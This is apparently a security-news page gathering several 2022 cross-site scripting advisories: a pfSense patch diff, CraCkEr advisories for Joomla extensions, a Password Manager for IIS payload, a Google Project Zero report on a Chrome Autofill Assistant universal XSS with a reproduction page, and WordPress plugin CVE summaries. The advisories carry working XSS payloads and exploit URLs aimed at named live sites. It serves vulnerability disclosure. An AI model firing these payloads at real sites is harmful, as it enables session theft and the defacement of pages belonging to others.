pfSense v2.5.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the browser.php component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a file name.

@@ -148,7 +148,7 @@ function get\_content($dir) {

?>

<tr\>

<td\></td\>

<td class\="fbFile vexpl text-left" id\="<?=$fqpn;?>"\>

<td class\="fbFile vexpl text-left" id\="<?=htmlspecialchars($fqpn);?>"\>

<?php $filename = htmlspecialchars(addslashes(str\_replace("//","/", "{$path}/{$file}"))); ?>

<div onClick\="$('#fbTarget').val('<?=$filename?>'); loadFile(); $('#fbBrowser').fadeOut();"\>

<img src\="/vendor/filebrowser/images/file\_<?=$type;?>.gif" alt\="" title\=""\>

CVE-2022-42247: Encode path+fn in browser.php. Fixes #13262 · pfsense/pfsense@73ca674

Joomla Rentalot Plus extension version 19.05 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Les Arbres Design                                                          ││  Software : Joomla Rentalot Plus 19.05                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /check-viewGET parameter 'instance' is vulnerable to XSShttps://demo.lesarbresdesign.info/check-view?option=com_rentalotplus&controller=check&task=ajax_get_availability&format=raw&tmpl=component&version=detailed&datefrom=&currency=undefined&instance=byhiw"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"onuph[-] Done

Joomla Rentalot Plus 19.05 Cross Site Scripting

Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: *XSS*# Exploit Author: *VP4TR10T*# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/<http://passwordmanager.adiscon.com/en/manual/>*# Software Link:*http://passwordmanager.adiscon.com/<http://passwordmanager.adiscon.com/>*# Version: *Version 2.0*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664*Affected URI (when trying to change user password):POST /isapi/PasswordManager.dll HTTP/1.1HTTP Payload (Affected Parameter ):ReturnURL=<script>alert(document.cookie)</script>*Cordially,*

Password Manager For IIS 2.0 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217GET parameter 'limitstart' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7GET parameter 'limit' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly[-] Done

Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

Google Chrome version 103.0.5060.53 suffers from an Autofill Assistant universal cross site scripting vulnerability.

    Chrome: Universal XSS in Autofill AssistantVULNERABILITY DETAILSFrom the Autofill Assistant README file[1]:Autofill Assistant is an execution engine to run user journeys on websites given a set of actions. These actions include clicking on buttons or scrolling to an element. They also provide a way to interact with the user or get input to advance in the flow.This report describes a chain of issues in the implementation of the assistant that allows a malicious attacker to execute JavaScript code in the context of an arbitrary website.1. Launch Check BypassThere are several ways to launch a user journey i.e. to activate the assistant on a specific web page. From an attacker's point of view, the most interesting one is via Android intent:// URIs. To run the assistant, a web page simply needs to initiate navigation to a special URI. However, `ExternalNavigationHandler::handleWithAutofillAssistant()` is only meant to launch the journey if the navigation request comes from a web page in a subdomain of google.com i.e. a trusted source[2]. Unfortunately, if you look at the source code of `ExternalNavigationHandler::isGoogleReferrer()`[3], you'll notice that it actually only checks whether the main frame of the tab that's being navigated currently hosts a google.com page. This means the attacker can bypass the check by opening a google.com page first and then navigating it to the intent URI. This action doesn't violate the same-origin policy.```w = open(\"https://google.com/\");setTimeout(() => w.location = \"intent://...\", 1000);```Another way to bypass the check is by putting a regular https:// link somewhere on google.com to the attacker-controlled website and configuring the attacker's web server to reply with an HTTP redirect to the intent:// URI.It's not clear whether the intended (rather than actual) checks are still too coarse-grained. Can an intent link be hosted on a user-controlled page in a subdomain of google.com, for example, via Google Sites? Can a third-party Android app launch the intent directly?2. Parameter ManipulationAutofill Assistant intent URIs include the address of the target web page, as well as script parameters, which the attacker can arbitrarily modify. Some of the parameters, like `DISABLE_RPC_SIGNING`[4] or `PASSWORD_CHANGE_USERNAME`, seem to have security impact. Also, the `DETAILS_*` parameter group allows the attacker to show a partially-controlled native-looking user interface on top of websites that have associated user journeys.If, at the moment, only Google is allowed to create these URIs, could signature checking be added to prevent arbitrary manipulation of the script parameters?3. Trigger Script InjectionThe most promising parameter is called `TRIGGER_SCRIPTS_BASE64`. It lets the attacker overwrite the backend's trigger script response[5]. Trigger scripts are lightweight scripts that may launch the regular journey flow once a certain set of conditions is met on the page. In addition, they can show a basic provisional user interface.Since the trigger condition definition language is powerful enough, for example, to perform a regex match on a specific property of a specific page element, and certain trigger actions, like loading a picture from an external server, may be visible to the attacker, a custom trigger script may be used to exfiltrate data from a web page character by character.A trigger script response can be overridden for any website, not just the ones that are currently supported by Autofill Assistant. Also, a user is shown a consent dialog when they attempt to use the assistant for the first time, but trigger scripts are executed without any user interaction.4. JavaScript Injection Via Property Filter`JsFilterBuilder` translates trigger conditions defined by a script into JavaScript code, which is then executed in the context of the target web page. The builder properly encodes all of its inputs, using functions like `AddArgument`[6] and making sure it's impossible to corrupt the generated function and execute arbitrary code, with one unfortunate exception:```message PropertyFilter {  // The property to filter against.  optional string property = 1;  oneof value {    TextFilter text_filter = 2;    AutofillValueRegexp autofill_value_regexp = 3;  }}```The code that translates `PropertyFilter` simply concatenates the property name parameter, skipping the encoding[7]:```bool JsFilterBuilder::AddFilter(const SelectorProto::Filter& filter) {[...]    case SelectorProto::Filter::kProperty:      AddRegexpFilter(filter.property().text_filter(),                      filter.property().property());[...]}void JsFilterBuilder::AddRegexpFilter(const TextFilter& filter,                                      const std::string& property) {  std::string re_var = AddRegexpInstance(filter);  AddLine({\"elements = elements.filter((e) => \", re_var, \".test(e.\", property,           \"));\"});}```As a result, the attacker can run arbitrary JavaScript with a trigger script like the following:```trigger_scripts {  trigger_condition {    selector {      filters { css_selector: \"*\" }      filters {        property {          property: \"a+alert(location)\"          text_filter {            re2: \"\"          }        }      }    }  }}```which gets translated into:```elements = elements.filter((e) => v1.test(e.a + alert(location)));```[1] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/[2] https://source.chromium.org/chromium/chromium/src/+/main:chrome/android/java/src/org/chromium/chrome/browser/externalnav/ExternalNavigationDelegateImpl.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=323[3] https://source.chromium.org/chromium/chromium/src/+/main:components/external_intents/android/java/src/org/chromium/components/external_intents/ExternalNavigationHandler.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=2098[4] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/script_parameters.cc;drc=4c5a895bed6c12687227f92c8d66dfb0bfb03225;l=111[5] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/service.proto;drc=39e992a5452136dd9944c9c957245e3f88885e71;l=783[6] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=197[7] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=189VERSIONGoogle Chrome 103.0.5060.53 (Official Build)REPRODUCTION CASE```<body><h1>Click me</h1><script>NS = \".org.chromium.chrome.browser.autofill_assistant.\";TARGET_URL = \"https://google.com/\";onclick = () => {  w = open(\"https://google.com/\");  setTimeout(() => {  w.location = `intent://a/#Intent;    scheme=http;    S.browser_fallback_url=${escape(TARGET_URL)};    B${NS}ENABLED=true;    B${NS}START_IMMEDIATELY=false;    S${NS}TRIGGER_SCRIPTS_BASE64=CiQKIkIgSgMSASpKGXIXChFhK2FsZXJ0KGxvY2F0aW9uKRICCgA=;    end`.replace(/\\s/g, \"\");  }, 1000);}</script></body>```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-09-22.Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline. For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Found by: glazunov@google.com

Google Chrome 103.0.5060.53 Autofill Assistant Universal Cross Site Scripting

Joomla Easy Shop extension version 1.4.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomTech - joomtech.net                                                    ││  Software : Joomla Easy Shop 1.4.1                                                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path:/supermarket/index.phpGET parameter 'file' is vulnerable to XSShttps://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium[-] Done

Joomla Easy Shop 1.4.1 Cross Site Scripting

The Goolytics WordPress plugin before 1.1.2 does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-3132

The Donation Thermometer WordPress plugin before 2.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-3128

The Zephyr Project Manager WordPress plugin before 3.2.55 does not have any authorisation as well as CSRF in all its AJAX actions, allowing unauthenticated users to call them either directly or via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins.

CVE-2022-2839

The WP Socializer WordPress plugin before 7.3 does not sanitise and escape some of its Icons settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

Tag

#xss